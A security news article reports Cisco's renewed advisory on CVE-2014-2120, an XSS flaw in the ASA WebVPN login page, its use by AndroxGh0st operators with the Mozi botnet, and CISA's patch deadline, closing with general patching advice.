On Monday, Cisco issued an updated advisory highlighting an ongoing threat linked to a long-standing vulnerability in its Adaptive Security Appliance (ASA). The flaw, identified as CVE-2014-2120, has a CVSS score of 4.3 and relates to insufficient input validation within the WebVPN login interface. This vulnerability permits unauthenticated remote attackers to potentially execute cross-site scripting (XSS) attacks against users of the appliance.
Cisco cautioned that attackers could exploit this weakness by persuading users to click on malicious links. This advisory, originally released in March 2014, has gained renewed attention as information has surfaced regarding “additional attempted exploitation” of the vulnerability. As of December 2, 2024, the company has revised its bulletin to reflect this increased activity.
Recent findings by cybersecurity firm CloudSEK noted that the AndroxGh0st threat actors have incorporated an array of vulnerabilities, including CVE-2014-2120, into their malware operations. This integration highlights a systematic exploitation of various weaknesses in internet-facing applications to spread their malicious software.
Furthermore, the AndroxGh0st malware leverages the Mozi botnet, enhancing its capacity and reach in attacking targeted systems. This combination of strategies poses a significant threat to organizations relying on Cisco ASA devices.
In response to the escalating risk, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this flaw to its Known Exploited Vulnerabilities Catalog last month. This designation mandates that Federal Civilian Executive Branch agencies address and remediate the issue by December 3, 2024, underscoring its severity.
Given the increased exploitation attempts, Cisco ASA users are strongly advised to ensure that their systems are up to date, reinforcing defenses against potential cyber threats. Maintaining vigilant cybersecurity practices is essential for safeguarding against attacks that exploit these vulnerabilities.
As business owners assess their security posture, it is crucial to recognize the potential adversarial tactics that could be employed in attacks that exploit such vulnerabilities. Techniques such as initial access through malicious links and the manipulation of software integrity could fall under the MITRE ATT&CK framework, specifically within the categories of initial access and execution.
For those managing Cisco systems, it is vital to stay informed and proactive in patching known vulnerabilities, not only in order to comply with federal requirements but also to protect sensitive data from the ever-evolving landscape of cyber threats.
